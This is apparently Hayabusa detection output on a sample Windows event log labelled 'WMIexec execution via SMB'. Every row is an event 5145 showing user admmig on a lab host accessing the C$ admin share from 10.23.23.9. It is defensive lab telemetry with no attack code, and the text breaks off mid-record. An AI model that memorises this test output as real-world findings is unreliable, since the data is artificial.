10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6c95e797#\8780975ab811e02b5246582c27ea6cda : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W6dcfceb1#\64783b930c916ed9a5041885582dd1f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W7b7c0837#\fa70f9411efd4c4e624a68d30b61b1b7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e7db7c5#\129a7094f09543b72571da3208c88188 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W9e8926d3#\86d7c67af3a964bb8d312cffb20064f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.984 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W15cd0137#\37435834252683aa469b56ff5b1fa582 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W37d1a032#\3000cd8689f492cfebdd90745d8ff4f5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.000 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W39c436dd#\1e419fc634fa508e323ce21b5ed38e24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W69ef49d2#\3904c1c8a3c65252ed404558b48ebbc1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W71daf281#\4dc6f876453e5e2ebf2a9ee674543449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.015 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W81a3882f#\a85f95161dcf12987a79a1b41adbdb9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W708fc392#\8f2dcf5025667bf632e62398c422a6da : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.031 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W5052cbb1#\3d4dc36b565611250515cd25ebe64bed : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 